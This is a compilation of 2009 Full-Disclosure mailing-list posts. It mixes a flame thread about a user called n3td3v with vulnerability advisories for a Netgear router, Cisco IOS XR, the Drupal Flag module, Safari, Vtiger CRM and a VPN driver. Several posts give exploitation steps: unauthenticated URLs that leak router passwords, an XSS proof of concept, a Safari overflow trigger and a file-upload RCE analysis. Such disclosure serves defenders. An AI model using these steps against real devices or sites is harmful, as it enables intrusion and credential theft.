Product Vulnerability Response Team -BEGIN PGP SIGNATURE- Version: PGP 8.1 iQEVAwUBSosOXJI1FvIeMomJAQE4qQf+KdeBdZUbZQmwe5ju2QjTShSQfvGsnQmd pF/39tsaJEXy+kiGxwYiGtkXAT9Ty8nIE6lmP2iN+u5lwgA92V7edG8NOFxsabmz PfcRFlQ4hgmEM9z8XvUqbqf3YO+yobhoIt779VWj4w7jQxuWvg6xW4GZAMSvU8uB FRAg/Xn6hQdH18ymtjgIsnVdrcSumy7C/+iXGJJjpqiwFoRTFIZCxts0x06ZpLdf K9X3bAOYoGRA5/uXgDmln0J4/TkgqAIYmzeo4ogm2dfwLCOJsqajZzvoREwkF7yu gt5ZmSIJ6AU0mj+jimiBEjkQH6RY/xcNaU3ZFL85ejrmiFNVa8NmVA== =6Sx8 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] False statements made about security researcher n3td3v
dont feed the troll ;)
Andrew Kuriger schrieb:
> Dude really?
>
> Nice signature: "Be Yourself @ mail.com!
> Choose From 200+ Email Addresses
> Get a Free Account at www.mail.com!"
>
> Nobody cares. I just find it funny.
>
> On Tue, 18 Aug 2009 14:43:15 -0500, "someone lawyer"
> wrote:
>
>> List,
>>
>> Below are (malice) false statements about my client.
>>
>> Thu Jul 16 13:54:34 BST 2009
>>
>> ureleet at gmail.com
>>
>> "n3td3v is posting as ant-sec"
>>
>> "he is hacking and spreading disinformation on
>> full-d."
>>
>> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069692.html
>>
>> Sun Jul 26 02:40:47 BST 2009
>>
>> antisecav at hushmail.com
>>
>> "Breaking: antisec and n3td3v responsible for Matasano hacking"
>>
>> "n3td3v/antisec is proud to announce official
>> partnership with antisec ("the scene")"
>>
>> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069878.html
>>
>> some...@lawyer.com
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] False statements made about security researcher n3td3v
Dude really?
Nice signature: "Be Yourself @ mail.com!
Choose From 200+ Email Addresses
Get a Free Account at www.mail.com!"
Nobody cares. I just find it funny.
On Tue, 18 Aug 2009 14:43:15 -0500, "someone lawyer"
wrote:
> List,
>
> Below are (malice) false statements about my client.
>
> Thu Jul 16 13:54:34 BST 2009
>
> ureleet at gmail.com
>
> "n3td3v is posting as ant-sec"
>
> "he is hacking and spreading disinformation on
> full-d."
>
> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069692.html
>
> Sun Jul 26 02:40:47 BST 2009
>
> antisecav at hushmail.com
>
> "Breaking: antisec and n3td3v responsible for Matasano hacking"
>
> "n3td3v/antisec is proud to announce official
> partnership with antisec ("the scene")"
>
> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069878.html
>
> some...@lawyer.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] False statements made about security researcher n3td3v
List,
Below are (malice) false statements about my client.
Thu Jul 16 13:54:34 BST 2009
ureleet at gmail.com
"n3td3v is posting as ant-sec"
"he is hacking and spreading disinformation on
full-d."
http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069692.html
Sun Jul 26 02:40:47 BST 2009
antisecav at hushmail.com
"Breaking: antisec and n3td3v responsible for Matasano hacking"
"n3td3v/antisec is proud to announce official
partnership with antisec ("the scene")"
http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069878.html
some...@lawyer.com
--
Be Yourself @ mail.com!
Choose From 200+ Email Addresses
Get a Free Account at www.mail.com!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Information disclosure on Netgear WNR2000
Dere is several mino' vulnerabilities on de Netgear WNR2000 wireless routa' runnin' firmware 1.2.0.8. 1. Unaudenticated disclosho' man uh WPA/WPA2 passwo'd, dig dis: Simply request widout audenticashun: http://netgear/router-info.htm http://netgear/cgi-bin/router-info.htm De routa' gots'ta respond wid: DeviceID:WNR2000; HardwareVersion:; FirmwareVersion:V1.2.0.8NA; WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf 2. Unaudenticated disclosho' man uh administrato' passwo'd Simply request widout audenticashun: http://netgear/cgi-bin/NETGEAR_WNR2000.cfg Skip de fust 128 bytes and ya' gots some tar dump uh de stashsystem. WORD! Reverse engineerin' de weak admin passwo'd audenticashun scheme be left as an 'esercise t'de eyeballer. Ah be baaad... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Cisco Security Advisory: Cisco IOS XR Software Border Gateway Protocol Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Security Advisory: Cisco IOS XR Software Border Gateway Protocol Vulnerability Advisory ID: cisco-sa-20090818-bgp http://www.cisco.com/warp/public/707/cisco-sa-20090818-bgp.shtml Revision 1.0 For Public Release 2009 August 18 1500 UTC (GMT) - - Summary === Cisco IOS XR will reset a Border Gateway Protocol (BGP) peering session when receiving a specific invalid BGP update. The vulnerability manifests when a BGP peer announces a prefix with a specific invalid attribute. On receipt of this prefix, the Cisco IOS XR device will restart the peering session by sending a notification. The peering session will flap until the sender stops sending the invalid/corrupt update. This is a different vulnerability to what was disclosed in the Cisco Security Advisory "Cisco IOS Software Border Gateway Protocol 4-Byte Autonomous System Number Vulnerabilities" disclosed on the 2009 July 29 1600 UTC at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20090729-bgp.shtml Cisco is preparing to release free software maintenance upgrade (SMU) that address this vulnerability. This advisory will be updated once the SMU is available. A workaround that mitigates this vulnerability is available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20090818-bgp.shtml Affected Products = This vulnerability affects all Cisco IOS XR software devices after and including software release 3.4.0 configured with BGP routing. Vulnerable Products +-- To determine the Cisco IOS XR Software release that is running on a Cisco product, administrators can log in to the device and issue the show version command to display the system banner. The system banner confirms that the device is running Cisco IOS XR Software by displaying text similar to "Cisco IOS XR Software". The software version is displayed after the text "Cisco IOS XR Software". The following example identifies a Cisco CRS-1 that is running Cisco IOS XR Software Release 3.6.2: RP/0/RP0/CPU0:CRS#show version Tue Aug 18 14:25:17.407 AEST Cisco IOS XR Software, Version 3.6.2[00] Copyright (c) 2008 by Cisco Systems, Inc. ROM: System Bootstrap, Version 1.49(20080319:195807) [CRS-1 ROMMON], CRS uptime is 4 weeks, 4 days, 1 minute System image file is "disk0:hfr-os-mbi-3.6.2/mbihfr-rp.vm" cisco CRS-8/S (7457) processor with 4194304K bytes of memory. 7457 processor at 1197Mhz, Revision 1.2 17 Packet over SONET/SDH network interface(s) 1 DWDM controller(s) 17 SONET/SDH Port controller(s) 8 TenGigabitEthernet/IEEE 802.3 interface(s) 2 Ethernet/IEEE 802.3 interface(s) 1019k bytes of non-volatile configuration memory. 38079M bytes of hard disk. 981440k bytes of ATA PCMCIA card at disk 0 (Sector size 512 bytes). Configuration register on node 0/0/CPU0 is 0x102 Boot device on node 0/0/CPU0 is mem: !--- output truncated The following example identifies a Cisco 12404 router that is running Cisco IOS XR Software Release 3.7.1: RP/0/0/CPU0:GSR#show version Cisco IOS XR Software, Version 3.7.1[00] Copyright (c) 2008 by Cisco Systems, Inc. ROM: System Bootstrap, Version 12.0(20051020:160303) SOFTWARE Copyright (c) 1994-2005 by cisco Systems, Inc. GSR uptime is 3 weeks, 6 days, 3 hours, 20 minutes System image file is "disk0:c12k-os-mbi-3.7.1/mbiprp-rp.vm" cisco 12404/PRP (7457) processor with 2097152K bytes of memory. 7457 processor at 1266Mhz, Revision 1.2 1 Cisco 12000 Series Performance Route Processor 1 Cisco 12000 Series - Multi-Service Blade Controller 1 1 Port ISE Packet Over SONET OC-48c/STM-16 Controller (1 POS) 1 Cisco 12000 Series SPA Interface Processor-601/501/401 3 Ethernet/IEEE 802.3 interface(s) 1 SONET/SDH Port controller(s) 1 Packet over SONET/SDH network interface(s) 4 PLIM QoS controller(s) 8 FastEthernet/IEEE 802.3 interface(s) 1016k bytes of non-volatile configuration memory. 1000496k bytes of disk0: (Sector size 512 bytes). 65536k bytes of Flash internal SIMM (Sector size 256k). Configuration register on node 0/0/CPU0 is 0x2102 Boot device on node 0/0/CPU0 is disk0: !--- output truncated Additional information about Cisco IOS XR software release naming conventions is available in the "White Paper: Cisco IOS Reference Guide" at the following link: http://www.cisco.com/warp/public/620/1.html#t6 Additional information about Cisco IOS XR software time-based release model is available in the "White Paper: Guidelines for Cisco IOS XR Software" at the following link: http://www.cisco.com/en/US/prod/coll
[Full-disclosure] Drupal flag module xss vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Vulnerability Summary Report
Author: Justin C. Klein Keane
Disclosure URL:
http://lampsecurity.org/drupal-flag-module-vulnerability
Description of Vulnerability:
- - -
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL that provides extensibility through various
third party modules. The Flag module (http://drupal.org/project/flag)
"is a flexible flagging system that is completely customizable by the
administrator. Using this module, the site administrator can provide any
number of flags for nodes, comments, or users. Some possibilities
include bookmarks, marking important, friends, or flag as offensive.
With extensive views integration, you can create custom lists of popular
content or keep tabs on important content."
The Flag module contains a cross site scripting vulnerability because it
does not properly sanitize output of role names before display during
flag creation.
Systems affected:
- - -
Drupal 6.13 with Flag 6.x-1.1 was tested and shown to be vulnerable.
Impact:
- - ---
XSS vulnerabilities may expose site administrative accounts to
compromise which could lead to web server process compromise.
Mitigating factors:
- - ---
The Flag module must be installed. To carry out a role based XSS
exploit against the module the attacker must be able to inject malicious
role names which requires 'administer permissions' or write access to
the Drupal database. Only users with permission to 'administer flags'
are affected by this vulnerability.
Proof of Concept:
- -
1. Install Drupal 6.13
2. Install Flag 6.x-1.1
3. Enable the Flag and Flag actions modules from Administer -> Site
building -> Modules
4. Click the Administer -> User Management -> Roles link
5. Enter "alert('xss');" in the 'Name' textarea and
click the 'Add role' button
6. (Note that this triggers a XSS, a vulnerability in 6.13 core)
7. Click Administer -> Site Building -> Flags
8. Click the 'Add' tab
9. Fill in an arbitrary 'Flag name' and click the 'Submit' button
10. Observe the JavaScript alert
Technical details:
-
The Flag module fails to sanitize role names on line 708 of
flag.views.inc before display.
Vendor Response:
- -
It is the position of Drupal security that "'administer permissions'
allows arbitrary permission escalation already, so [...] we do not
consider it a security vulnerability."
Patch
- ---
Applying the following patch mitigates these threats.
diff -up flag/flag.module flag_fixed/flag.module
- --- flag/flag.module2009-03-14 02:13:54.0 -0400
+++ flag_fixed/flag.module 2009-08-18 09:23:37.404047187 -0400
@@ -702,10 +702,11 @@ function flag_form(&$form_state, $name,
$form['roles']['#value'] = $flag->roles;
}
+ $options = array_map('check_plain', node_get_types('names'));
$form['types'] = array(
'#type' => 'checkboxes',
'#title' => t('What nodes this flag may be used on'),
- -'#options' => node_get_types('names'),
+'#options' => $options,
'#default_value' => $flag->types,
'#description' => t('Check any node types that this flag may be
used on. You must check at least one node type.'),
'#required' => TRUE,
- --
Justin C. Klein Keane
http://www.MadIrish.net
http://www.LAMPSecurity.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (GNU/Linux)
Comment: Using GnuPG with CentOS - http://enigmail.mozdev.org
iQD1AwUBSoqzopEpbGy7DdYAAQJxDQb/eXDs65vUYUoBmK6dd+wueewHPfHIeAQ/
qe8g8IlrfYOFEHalkWmTSt9tLh6WLstjLXilXrSChWoBEfx3dL/qDkVsI++lFOsi
Z5X9WGhZEJUXw/NGA/ltmtxE0EsFuCHLvuUFyXvG2EdAR7UsRPpmkCAqYC4M16mz
C5EGdWwPrQCQjbViKX3jURHLwlaTMyckNE3yyMbcfM2CDuS1AZXUC/BwbMoKrCkH
Z6coe0gDbV6Y60FPv+PCj2R+CZKzmE0cODdU4iwXx1gxDcx9AxVedZxbKitEi3Hl
mHEMJ+w80GQ=
=M2Ce
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Safari buffer overflow
Three weeks ago, I coded a nice little browser fuzzer, and started playing with various browsers: IE, Firefox, Safari, Chrome, Opera... I found an interesting Safari crash after couple of hours of fuzzing. It was a stack overflow (and a smile on my face). Since then, every now and then I took some time to play with it. Today, I noticed that Apple updated Safari 4.0.2 to 4.0.3. Among some other vulnerabilities, this vulnerability has also been fixed. The Apple announcement is available at http://lists.apple.com/archives/security-announce/2009/Aug/msg2.html. Depends on the perspective, but from my own - Very Bad Luck. C'est la vie, things like this happen... Some bugs die young. This simple and interesting vulnerability is located in WebKit's JavaScript code that parses floating point numbers. It can be triggered with script like this: - var Overflow = "31337" + 0.313373133731337313373133731337...; - Or something like this... - - Play little bit with numbers to get a desirable return address, little bit of heap spraying, and it works. Regards, Leon Juranic ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (USA) Fighting the tyranny of fusion centers / JTTF harassment and profiling
List, I ask you not make false statements involving my client. some...@lawyer.com - Original Message - From: ask...@hushmail.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] (USA) Fighting the tyranny of fusion centers / JTTF harassment and profiling Date: Fri, 14 Aug 2009 22:47:50 -0500 This post was sponsored heavily by n3td3v intelligence ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Be Yourself @ mail.com! Choose From 200+ Email Addresses Get a Free Account at www.mail.com! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vtiger CRM 5.0.4 Multiple Vulnerabilities
Vtiger CRM 5.0.4 Multiple Vulnerabilities
Name Multiple Vulnerabilities in Vtiger CRM
Systems Affected Vtiger CRM 5.0.4 and possibly earlier versions
Severity Medium
Impact (CVSSv2) Medium 6/10, vector: (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Vendorhttp://www.vtigercrm.com
Advisory
http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt
Authors Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Date 20090818
I. BACKGROUND
Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
for small and medium businesses, with low-cost product support available
to production users that need reliable support.
II. DESCRIPTION
Multiple Vulnerabilities exist in Vtiger CRM software.
Some of the technical issues highlighted in this advisory are part of a
wider publication, "PHP filesystem attack vectors - Take Two", and are
generic to applications written in the PHP language:
http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/
III. ANALYSIS
Summary:
A) Remote Code Execution (RCE) Vulnerability
B) Cross Site Request Forgery (CSRF) Vulnerabilities
C) Local File Inclusion (LFI) Vulnerability
D) Cross Side Scripting (XSS) Vulnerability
A) Remote Code Execution (Windows Only) Vulnerability
A Remote Code Execution vulnerability exists in Vtiger CRM version
5.0.4. In order to exploit this vulnerability an account on the CRM
system is required.
The vulnerability resides in the "Compose Mail" section. The software
permits sending email with attachments and offers a draft save feature.
When this feature is requested and an attachment is specified, the
"saveForwardAttachments" validation routine is called.
This routine involves some security checks to handle uploaded files, it
does blacklist extension checking and if a bad extension is detected the
txt extension is appended to the file-name.
The following is the specific section:
--8<--8<--8<--8<--8<--8<--8<-Vtiger CRM 5.0.4 Multiple Vulnerabilities
Name Multiple Vulnerabilities in Vtiger CRM
Systems Affected Vtiger CRM 5.0.4 and possibly earlier versions
Severity Medium
Impact (CVSSv2) Medium 6/10, vector: (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Vendorhttp://www.vtigercrm.com
Advisory
Authors Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Date 20090818
I. BACKGROUND
Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
for small and medium businesses, with low-cost product support available
to production users that need reliable support.
II. DESCRIPTION
Multiple Vulnerabilities exist in Vtiger CRM software.
Some of the technical issues highlighted in this advisory are part of a
wider publication, "PHP filesystem attack vectors - Take Two", and are
generic to applications written in the PHP language:
http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/
III. ANALYSIS
Summary:
A) Remote Code Execution (RCE) Vulnerability
B) Cross Site Request Forgery (CSRF) Vulnerabilities
C) Local File Inclusion (LFI) Vulnerability
D) Cross Side Scripting (XSS) Vulnerability
A) Remote Code Execution (Windows Only) Vulnerability
A Remote Code Execution vulnerability exists in Vtiger CRM version
5.0.4. In order to exploit this vulnerability an account on the CRM
system is required.
The vulnerability resides in the "Compose Mail" section. The software
permits sending email with attachments and offers a draft save feature.
When this feature is requested and an attachment is specified, the
"saveForwardAttachments" validation routine is called.
This routine involves some security checks to handle uploaded files, it
does blacklist extension checking and if a bad extension is detected the
txt extension is appended to the file-name.
The following is the specific section:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ext_pos = strrpos($binFile, ".");
$ext = substr($binFile, $ext_pos + 1);
if (in_array(strtolower($ext), $upload_badext))
{
$binFile .= ".txt";
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
It's known that in some circostances (for example when the PHP handler
is configured using AddType/Action/AddHandler globally, eg. not inside
an Apache's Files/FilesMatch directive) blacklisting is not enough as
files in the form of "filename.php.foo" will be mapped back to PHP
an
[Full-disclosure] TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local
Original Advisory Link:
https://www.evilfingers.com/advisory/Advisory/TheGreenBow_VPN_Client_tgbvpn.sys_DoS.php
---[TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local
Privilege Escalation]->
Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
http://evilcodecave.blogspot.com
http://evilcodecave.wordpress.com
http://evilfingers.com
http://malwareAnalytics.com
